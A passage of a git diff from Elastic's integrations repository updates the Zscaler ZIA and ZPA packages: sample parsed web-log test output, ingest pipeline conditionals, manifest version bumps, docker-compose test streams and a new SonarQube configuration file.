+ ], + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-web\", \"event\" :{\"time\":\"Fri Feb 16 05:33:45 2024\",\"login\":\"test@example.com\",\"proto\":\"SSL\",\"eurl\":\"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1\",\"action\":\"Allowed\",\"appname\":\"General Browsing\",\"appclass\":\"General Browsing\",\"reqsize\":\"297\",\"respsize\":\"8022\",\"stime\":\"316\",\"ctime\":\"316\",\"urlclass\":\"Bandwidth Loss\",\"urlsupercat\":\"User-defined\",\"urlcat\":\"Corporate Marketing\",\"malwarecat\":\"None\",\"threatname\":\"None\",\"riskscore\":\"0\",\"dlpeng\":\"None\",\"dlpdict\":\"None\",\"location\":\"Test DB\",\"dept\":\"Unknown Dept\",\"cip\":\"81.2.69.193\",\"sip\":\"81.2.69.143\",\"reqmethod\":\"NA\",\"respcode\":\"NA\",\"eua\":\"Unknown\",\"ereferer\":\"None\",\"ruletype\":\"None\",\"rulelabel\":\"None\",\"contenttype\":\"Other\",\"unscannabletype\":\"None\",\"deviceowner\":\"administrator1\",\"devicehostname\":\"TestMachine35\"}}", + "risk_score": 0.0, + "type": [ + "info" + ] + }, + "host": { + "name": "testmachine35" + }, + "http": { + "request": { + "bytes": 297, + "mime_type": "Other", + "referrer": "None" + }, + "response": { + "bytes": 8022 + } + }, + "network": { + "protocol": "ssl" + }, + "related": { + "hosts": [ + "TestMachine35" + ], + "ip": [ + "81.2.69.193", + "81.2.69.143" + ], + "user": [ + "test", + "administrator1", + "test@example.com" + ] + }, + "rule": { + "name": "None", + "ruleset": "None" + }, + "source": { + "nat": { + "ip": "81.2.69.193" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.example.com.com", + "full": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "original": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "path": "/params", + "query": "version=10.0.19041.1266&user=65792&Id=1", + "scheme": "https" + }, + "user": { + "domain": "example.com", + "email": "test@example.com", + "id": "test@example.com", + "name": [ + "test", + "administrator1" + ] + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Unknown" + }, + "zscaler_zia": { + "web": { + "app": { + "class": "General Browsing", + "name": "General Browsing" + }, + "ctime": 316, + "department": "Unknown Dept", + "device": { + "hostname": "TestMachine35" + }, + "dpl": { + "dictionaries": "None", + "engine": "None" + }, + "location": "Test DB", + "malware": { + "category": "None" + }, + "stime": 316, + "threat": { + "name": "None" + }, + "unscannable": { + "type": "None" + }, + "url": { + "category": { + "sub": "Corporate Marketing", + "super": "User-defined" + }, + "class": "Bandwidth Loss" + } + } + } + }, + { + "@timestamp": "2024-02-16T05:29:00.000Z", + "destination": { + "ip": "81.2.69.143" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "allowed", + "category": [ + "web" + ], + "kind": "event", + "original": "{ \"sourcetype\" : \"zscalernss-web\", \"event\" :{\"time\":\"Fri Feb 16 05:29:00 2024\",\"login\":\"test@example.com\",\"proto\":\"SSL\",\"eurl\":\"www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1\",\"action\":\"Allowed\",\"appname\":\"Microsoft Teams\",\"appclass\":\"Enterprise\",\"reqsize\":\"297\",\"respsize\":\"95429\",\"stime\":\"249000\",\"ctime\":\"249000\",\"urlclass\":\"Bandwidth Loss\",\"urlsupercat\":\"User-defined\",\"urlcat\":\"Corporate Marketing\",\"malwarecat\":\"None\",\"threatname\":\"None\",\"riskscore\":\"0\",\"dlpeng\":\"None\",\"dlpdict\":\"None\",\"location\":\"Test DB\",\"dept\":\"Unknown Trans\",\"cip\":\"81.2.69.193\",\"sip\":\"81.2.69.143\",\"reqmethod\":\"NA\",\"respcode\":\"NA\",\"eua\":\"Unknown\",\"ereferer\":\"None\",\"ruletype\":\"None\",\"rulelabel\":\"None\",\"contenttype\":\"Other\",\"unscannabletype\":\"None\",\"deviceowner\":\"NA\",\"devicehostname\":\"NA\"}}", + "risk_score": 0.0, + "type": [ + "info" + ] + }, + "http": { + "request": { + "bytes": 297, + "mime_type": "Other", + "referrer": "None" + }, + "response": { + "bytes": 95429 + } + }, + "network": { + "protocol": "ssl" + }, + "related": { + "ip": [ + "81.2.69.193", + "81.2.69.143" + ], + "user": [ + "test", + "test@example.com" + ] + }, + "rule": { + "name": "None", + "ruleset": "None" + }, + "source": { + "nat": { + "ip": "81.2.69.193" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.example.com.com", + "full": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "original": "https://www.example.com.com/params?version=10.0.19041.1266&user=65792&Id=1", + "path": "/params", + "query": "version=10.0.19041.1266&user=65792&Id=1", + "scheme": "https" + }, + "user": { + "domain": "example.com", + "email": "test@example.com", + "id": "test@example.com", + "name": "test" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Unknown" + }, + "zscaler_zia": { + "web": { + "app": { + "class": "Enterprise", + "name": "Microsoft Teams" + }, + "ctime": 249000, + "department": "Unknown Trans", + "dpl": { + "dictionaries": "None", + "engine": "None" + }, + "location": "Test DB", + "malware": { + "category": "None" + }, + "stime": 249000, + "threat": { + "name": "None" + }, + "unscannable": { + "type": "None" + }, + "url": { + "category": { + "sub": "Corporate Marketing", + "super": "User-defined" + }, + "class": "Bandwidth Loss" + } + } + } } ] } \ No newline at end of file diff --git a/packages/zscaler_zia/data_stream/web/elasticsearch/ingest_pipeline/default.yml b/packages/zscaler_zia/data_stream/web/elasticsearch/ingest_pipeline/default.yml index c612cac691e..d0df2ee03b9 100644 --- a/packages/zscaler_zia/data_stream/web/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zscaler_zia/data_stream/web/elasticsearch/ingest_pipeline/default.yml @@ -12,7 +12,6 @@ processors: - json: field: event.original target_field: resp - ignore_failure: true - remove: field: json if: ctx.input?.type == 'http_endpoint' @@ -95,7 +94,6 @@ processors: value: '{{{source.nat.ip}}}' if: ctx.source?.nat?.ip != null allow_duplicates: false - ignore_failure: true - convert: field: json.sip target_field: destination.ip @@ -112,7 +110,6 @@ processors: value: '{{{destination.ip}}}' if: ctx.destination?.ip != null allow_duplicates: false - ignore_failure: true - convert: field: json.reqsize target_field: http.request.bytes @@ -194,36 +191,40 @@ processors: } - uri_parts: field: json.url + if: ctx.json?.url != null && ctx.json.url != '' on_failure: - set: field: url.original value: '{{{json.eurl}}}' - if: ctx.json?.eurl != null - ignore_failure: true + if: ctx.json?.eurl != null && ctx.json.eurl != '' - set: field: url.full value: '{{{url.original}}}' - ignore_failure: true + if: ctx.url?.original != null && ctx.url.original != '' - urldecode: field: url.original ignore_missing: true - ignore_failure: true + if: ctx.url?.original != null && ctx.url.original != '' - urldecode: field: json.eua ignore_missing: true - ignore_failure: true + if: ctx.json?.eua != null && ctx.json.eua != '' - user_agent: field: json.eua + if: ctx.json?.eua != null && ctx.json.eua != '' on_failure: - set: field: user_agent.original value: '{{{json.eua}}}' - if: ctx.json?.eurl != null - ignore_failure: true + if: ctx.json?.eua != null && ctx.json.eua != '' - rename: field: json.login - target_field: user.email + target_field: user.id ignore_missing: true + - set: + field: user.email + copy_from: user.id + if: ctx.user?.id != null && ctx.user.id.contains('@') - dissect: if: ctx.user?.email != null && ctx.user.email.contains('@') field: user.email @@ -233,7 +234,6 @@ processors: value: '{{{json.deviceowner}}}' if: ctx.json?.deviceowner != null allow_duplicates: false - ignore_failure: true - foreach: field: user.name if: ctx.user?.name instanceof List @@ -243,6 +243,16 @@ processors: value: '{{{_ingest._value}}}' allow_duplicates: false ignore_missing: true + - append: + field: related.user + value: '{{{user.name}}}' + allow_duplicates: false + if: ctx.user?.name != null && !(ctx.user.name instanceof List) + - append: + field: related.user + value: '{{{user.id}}}' + allow_duplicates: false + if: ctx.user?.id != null && ctx.user.id != '' - rename: field: json.action target_field: event.action @@ -349,7 +359,6 @@ processors: value: '{{{zscaler_zia.web.device.hostname}}}' if: ctx.zscaler_zia?.web?.device?.hostname != null allow_duplicates: false - ignore_failure: true - rename: field: json.bwthrottle target_field: zscaler_zia.web.bandwidth_throttle @@ -370,7 +379,6 @@ processors: value: '{{{source.ip}}}' if: ctx.source?.ip != null allow_duplicates: false - ignore_failure: true - rename: field: json.ehost target_field: zscaler_zia.web.encoded_host @@ -388,7 +396,6 @@ processors: value: '{{{file.hash.md5}}}' if: ctx.file?.hash?.md5 != null allow_duplicates: false - ignore_failure: true - set: field: file.name value: '{{{json.filename}}}' @@ -413,7 +420,6 @@ processors: value: '{{{destination.domain}}}' if: ctx.destination?.domain != null allow_duplicates: false - ignore_failure: true - rename: field: json.fileclass target_field: zscaler_zia.web.file.class @@ -499,7 +505,6 @@ processors: - remove: field: event.original if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) - ignore_failure: true ignore_missing: true on_failure: - set: diff --git a/packages/zscaler_zia/manifest.yml b/packages/zscaler_zia/manifest.yml index ecfe58714ac..9ff2e157ec1 100644 --- a/packages/zscaler_zia/manifest.yml +++ b/packages/zscaler_zia/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: zscaler_zia title: Zscaler Internet Access -version: "2.18.1" +version: "2.19.0" description: Collect logs from Zscaler Internet Access (ZIA) with Elastic Agent. type: integration categories: @@ -11,7 +11,7 @@ source: license: "Elastic-2.0" conditions: kibana: - version: ^8.3.0 + version: ^8.12.0 elastic: subscription: "basic" screenshots: @@ -117,12 +117,14 @@ policy_templates: description: The header to check for a specific value specified by `secret.value`. required: false show_user: false + secret: false - name: secret_value type: password title: Secret Value description: The secret stored in the header name specified by `secret.header`. required: false show_user: false + secret: true owner: github: elastic/security-service-integrations type: elastic diff --git a/packages/zscaler_zpa/_dev/deploy/docker/docker-compose.yml b/packages/zscaler_zpa/_dev/deploy/docker/docker-compose.yml index b74714a2d9c..82ddd16b3c8 100644 --- a/packages/zscaler_zpa/_dev/deploy/docker/docker-compose.yml +++ b/packages/zscaler_zpa/_dev/deploy/docker/docker-compose.yml @@ -1,32 +1,27 @@ version: "2.3" services: zscaler-app-connector-status-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9015 -p=tcp /sample_logs/app_connector_status.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9015 -p=tcp /sample_logs/app_connector_status.log zscaler-zpa-audit-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9016 -p=tcp /sample_logs/audit.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9016 -p=tcp /sample_logs/audit.log zscaler-zpa-browser-access-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9017 -p=tcp /sample_logs/browser_access.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9017 -p=tcp /sample_logs/browser_access.log zscaler-zpa-user-activity-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9018 -p=tcp /sample_logs/user_activity.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9018 -p=tcp /sample_logs/user_activity.log zscaler-zpa-user-status-tcp: - image: docker.elastic.co/observability/stream:v0.8.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9019 -p=tcp /sample_logs/user_status.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9019 -p=tcp /sample_logs/user_status.log diff --git a/packages/zscaler_zpa/changelog.yml b/packages/zscaler_zpa/changelog.yml index 4ab7a1566c5..f982a44377d 100644 --- a/packages/zscaler_zpa/changelog.yml +++ b/packages/zscaler_zpa/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.17.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9404 - version: "1.16.1" changes: - description: Changed owners diff --git a/packages/zscaler_zpa/data_stream/app_connector_status/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/app_connector_status/_dev/test/system/test-default-config.yml index 4b7f186fad1..349c5b1b59b 100644 --- a/packages/zscaler_zpa/data_stream/app_connector_status/_dev/test/system/test-default-config.yml +++ b/packages/zscaler_zpa/data_stream/app_connector_status/_dev/test/system/test-default-config.yml @@ -6,3 +6,5 @@ data_stream: vars: listen_port: 9015 preserve_original_event: true +assert: + hit_count: 1 diff --git a/packages/zscaler_zpa/data_stream/audit/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/audit/_dev/test/system/test-default-config.yml index 9b04e983ed0..d1c93dca3e9 100644 --- a/packages/zscaler_zpa/data_stream/audit/_dev/test/system/test-default-config.yml +++ b/packages/zscaler_zpa/data_stream/audit/_dev/test/system/test-default-config.yml @@ -6,3 +6,5 @@ data_stream: vars: listen_port: 9016 preserve_original_event: true +assert: + hit_count: 1 diff --git a/packages/zscaler_zpa/data_stream/browser_access/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/browser_access/_dev/test/system/test-default-config.yml index 5f5f934c260..4b84ce8515c 100644 --- a/packages/zscaler_zpa/data_stream/browser_access/_dev/test/system/test-default-config.yml +++ b/packages/zscaler_zpa/data_stream/browser_access/_dev/test/system/test-default-config.yml @@ -6,3 +6,5 @@ data_stream: vars: listen_port: 9017 preserve_original_event: true +assert: + hit_count: 1 diff --git a/packages/zscaler_zpa/data_stream/user_activity/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/user_activity/_dev/test/system/test-default-config.yml index 1ea21cb02b5..e1895b635b3 100644 --- a/packages/zscaler_zpa/data_stream/user_activity/_dev/test/system/test-default-config.yml +++ b/packages/zscaler_zpa/data_stream/user_activity/_dev/test/system/test-default-config.yml @@ -6,3 +6,5 @@ data_stream: vars: listen_port: 9018 preserve_original_event: true +assert: + hit_count: 1 diff --git a/packages/zscaler_zpa/data_stream/user_status/_dev/test/system/test-default-config.yml b/packages/zscaler_zpa/data_stream/user_status/_dev/test/system/test-default-config.yml index d3d22bb6383..d04bcf8ef68 100644 --- a/packages/zscaler_zpa/data_stream/user_status/_dev/test/system/test-default-config.yml +++ b/packages/zscaler_zpa/data_stream/user_status/_dev/test/system/test-default-config.yml @@ -6,3 +6,5 @@ data_stream: vars: listen_port: 9019 preserve_original_event: true +assert: + hit_count: 1 diff --git a/packages/zscaler_zpa/manifest.yml b/packages/zscaler_zpa/manifest.yml index 018d397fd7a..e8334d439a1 100644 --- a/packages/zscaler_zpa/manifest.yml +++ b/packages/zscaler_zpa/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: zscaler_zpa title: Zscaler Private Access -version: "1.16.1" +version: "1.17.0" source: license: Elastic-2.0 description: Collect logs from Zscaler Private Access (ZPA) with Elastic Agent. diff --git a/sonar-project.properties b/sonar-project.properties new file mode 100644 index 00000000000..0864085516b --- /dev/null +++ b/sonar-project.properties @@ -0,0 +1,15 @@ +sonar.projectKey=elastic_integrations_AYu5LCaKQZlFqhqWIrk_ +sonar.host.url=https://sonar.elastic.dev +sonar.sources=packages + +sonar.log.level=INFO +sonar.sourceEncoding=UTF-8 + +# Coverage report created by elastic-package just reference to *.yml files +# Remove all these extensions to try to keep just *.yml files +sonar.exclusions=**/*.java,**/*.json,**/Dockerfile,**/*.tf,**/*.go,**/*.yaml,**/*.xml,**/*.md,**/*.hbs,**/*.jsp + +# Generic test coverage report format +# https://docs.sonarsource.com/sonarqube/latest/analyzing-source-code/test-coverage/generic-test-data/#generic-test-coverage +sonar.coverageReportPaths=build/test-coverage/coverage_merged.xml +